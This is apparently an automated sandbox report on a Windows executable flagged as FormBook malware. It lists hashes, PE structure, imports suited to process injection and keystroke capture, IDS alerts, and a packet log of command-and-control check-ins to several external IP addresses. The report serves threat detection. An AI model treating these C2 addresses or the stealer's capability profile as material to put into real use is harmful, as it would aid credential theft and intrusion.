                              MD5:b2218f5d997fcad8ffd678a82ca0a9b2
                              SHA1:dc6ecd5bc824bfc835338af196dbdd04859f5ff8
                              SHA256:09ac6376b07a7b513e3250e66dda03697803dc861dab52ed3a297046b6f1e065
                              SHA512:bc8423d8e5682309c491c6d8f7b0fee90838f28f6db76afb37ad65097543148078b4df3a76c277fef7e9ca4f12d9ff51f175de0f6896d748dbb274bc23348675
                              SSDEEP:24576:P4lavt0LkLL9IMixoEgeaan8yDfkFS93DMYAioGVAq9MmCS:Kkwkn9IMHeaaTzlTMe6aPCS
                              TLSH:2D45CF0373DD83A5C3725273BA65BB01AEBB7C2546A1F59B2FD4093DF920122921E673
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                              File Icon

                              Icon Hash:aaf3e3e3938382a0

                              Static PE Info

                              General

                              Entrypoint:0x426bf7
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66E0CC9C [Tue Sep 10 22:47:56 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:bbac62fd99326ea68ec5a33b36925dd1

                              Entrypoint Preview

                              Instruction
                              call 00007F4A9122655Ch
                              jmp 00007F4A91219444h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push edi
                              push esi
                              mov esi, dword ptr [esp+10h]
                              mov ecx, dword ptr [esp+14h]
                              mov edi, dword ptr [esp+0Ch]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007F4A912195CAh
                              cmp edi, eax
                              jc 00007F4A9121992Eh
                              bt dword ptr [004C0158h], 01h
                              jnc 00007F4A912195C9h
                              rep movsb
                              jmp 00007F4A912198DCh
                              cmp ecx, 00000080h
                              jc 00007F4A91219794h
                              mov eax, edi
                              xor eax, esi
                              test eax, 0000000Fh
                              jne 00007F4A912195D0h
                              bt dword ptr [004BA370h], 01h
                              jc 00007F4A91219AA0h
                              bt dword ptr [004C0158h], 00000000h
                              jnc 00007F4A9121976Dh
                              test edi, 00000003h
                              jne 00007F4A9121977Eh
                              test esi, 00000003h
                              jne 00007F4A9121975Dh
                              bt edi, 02h
                              jnc 00007F4A912195CFh
                              mov eax, dword ptr [esi]
                              sub ecx, 04h
                              lea esi, dword ptr [esi+04h]
                              mov dword ptr [edi], eax
                              lea edi, dword ptr [edi+04h]
                              bt edi, 03h
                              jnc 00007F4A912195D3h
                              movq xmm1, qword ptr [esi]
                              sub ecx, 08h
                              lea esi, dword ptr [esi+08h]
                              movq qword ptr [edi], xmm1
                              lea edi, dword ptr [edi+08h]
                              test esi, 00000007h
                              je 00007F4A91219625h

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2012 UPD4 build 61030
                              • [RES] VS2012 UPD4 build 61030
                              • [LNK] VS2012 UPD4 build 61030

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b6c0x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5dfc8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c20.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27700x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x858.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x8be740x8c00074af66fa540568c59b3868e78900e476False0.5690970284598215data6.681489717174931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x8d0000x2c76a0x2c800576c856afaad699ad9fe099fc6a9ce33False0.33122476299157305zlib compressed data5.781163507108141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xba0000x9f340x6200e6d2e204147f7cdc3055011093632f54False0.1639030612244898data2.004392861291539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xc40000x5dfc80x5e0003ebd7d545a8480bc026789917b0be9b6False0.930674451462766data7.8992778992168775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1220000xa4620xa600c2f6ddaeef894b7510c3be928eeae5ddFalse0.5080948795180723data5.238496692777452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                              RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                              RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                              RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                              RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                              RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                              RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                              RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                              RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                              RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                              RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0xcc7b80x552cfdata1.000332493500612
                              RT_GROUP_ICON0x121a880x76dataEnglishGreat Britain0.6610169491525424
                              RT_GROUP_ICON0x121b000x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0x121b140x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0x121b280x14dataEnglishGreat Britain1.25
                              RT_VERSION0x121b3c0xdcdataEnglishGreat Britain0.6181818181818182
                              RT_MANIFEST0x121c180x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                              Imports

                              DLLImport
                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                              USER32.dllCopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-11T14:25:23.685445+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.11497103.33.130.19080TCP
                              2024-09-11T14:25:40.404921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971118.139.62.22680TCP
                              2024-09-11T14:25:42.624519+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971218.139.62.22680TCP
                              2024-09-11T14:25:45.179370+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971318.139.62.22680TCP
                              2024-09-11T14:25:47.733495+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114971418.139.62.22680TCP
                              2024-09-11T14:25:53.594449+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971566.81.203.1080TCP
                              2024-09-11T14:25:56.139554+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971666.81.203.1080TCP
                              2024-09-11T14:25:58.725921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114971766.81.203.1080TCP
                              2024-09-11T14:26:01.474977+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114971866.81.203.1080TCP
                              2024-09-11T14:26:07.700537+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149719103.42.108.4680TCP
                              2024-09-11T14:26:10.257388+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149720103.42.108.4680TCP
                              2024-09-11T14:26:12.825439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149721103.42.108.4680TCP
                              2024-09-11T14:26:15.364789+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149722103.42.108.4680TCP
                              2024-09-11T14:26:20.868957+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497233.33.130.19080TCP
                              2024-09-11T14:26:23.445179+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497243.33.130.19080TCP
                              2024-09-11T14:26:26.521061+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497253.33.130.19080TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 11, 2024 14:25:23.206465960 CEST4971080192.168.2.113.33.130.190
                              Sep 11, 2024 14:25:23.214799881 CEST80497103.33.130.190192.168.2.11
                              Sep 11, 2024 14:25:23.214909077 CEST4971080192.168.2.113.33.130.190
                              Sep 11, 2024 14:25:23.222680092 CEST4971080192.168.2.113.33.130.190
                              Sep 11, 2024 14:25:23.227878094 CEST80497103.33.130.190192.168.2.11
                              Sep 11, 2024 14:25:23.684370041 CEST80497103.33.130.190192.168.2.11
                              Sep 11, 2024 14:25:23.685355902 CEST80497103.33.130.190192.168.2.11
                              Sep 11, 2024 14:25:23.685445070 CEST4971080192.168.2.113.33.130.190
                              Sep 11, 2024 14:25:23.687897921 CEST4971080192.168.2.113.33.130.190
                              Sep 11, 2024 14:25:23.695733070 CEST80497103.33.130.190192.168.2.11
                              Sep 11, 2024 14:25:39.158472061 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:39.164093018 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:39.164169073 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:39.174925089 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:39.179981947 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:40.404805899 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:40.404829979 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:40.404844046 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:40.404921055 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:40.404961109 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:40.404974937 CEST804971118.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:40.405054092 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:40.678906918 CEST4971180192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:41.709125996 CEST4971280192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:41.716350079 CEST804971218.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:41.716420889 CEST4971280192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:41.728666067 CEST4971280192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:41.736953020 CEST804971218.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:42.624095917 CEST804971218.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:42.624303102 CEST804971218.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:42.624519110 CEST4971280192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:43.241626024 CEST4971280192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:44.260293961 CEST4971380192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:44.265310049 CEST804971318.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:44.265424967 CEST4971380192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:44.276164055 CEST4971380192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:44.281867981 CEST804971318.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:44.281879902 CEST804971318.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:45.179224014 CEST804971318.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:45.179290056 CEST804971318.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:45.179369926 CEST4971380192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:45.788427114 CEST4971380192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:46.806888103 CEST4971480192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:46.812819958 CEST804971418.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:46.812944889 CEST4971480192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:46.821049929 CEST4971480192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:46.825907946 CEST804971418.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:47.733251095 CEST804971418.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:47.733274937 CEST804971418.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:47.733494997 CEST4971480192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:47.736192942 CEST4971480192.168.2.1118.139.62.226
                              Sep 11, 2024 14:25:47.741257906 CEST804971418.139.62.226192.168.2.11
                              Sep 11, 2024 14:25:53.003635883 CEST4971580192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:53.008589029 CEST804971566.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:53.008663893 CEST4971580192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:53.020313978 CEST4971580192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:53.025374889 CEST804971566.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:53.594269991 CEST804971566.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:53.594393015 CEST804971566.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:53.594449043 CEST4971580192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:54.522677898 CEST4971580192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:55.541405916 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:55.547158003 CEST804971666.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:55.547306061 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:55.558121920 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:55.563179970 CEST804971666.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:56.138808012 CEST804971666.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:56.139492035 CEST804971666.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:56.139554024 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:57.069525003 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.088223934 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.093267918 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.093369961 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.105159044 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.111227036 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.111349106 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.679058075 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.725920916 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.752980947 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.753163099 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:59.616442919 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.639983892 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.645098925 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:00.645195007 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.652930975 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.658967018 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474500895 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474853039 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474869013 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474977016 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.475014925 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.478365898 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.483742952 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:06.824872017 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.829849005 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:06.829969883 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.846338987 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.851202011 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700239897 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700473070 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700536966 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:08.350718975 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.370184898 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.375288010 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:09.375399113 CEST4972080192.168.2.11103.42.108.46
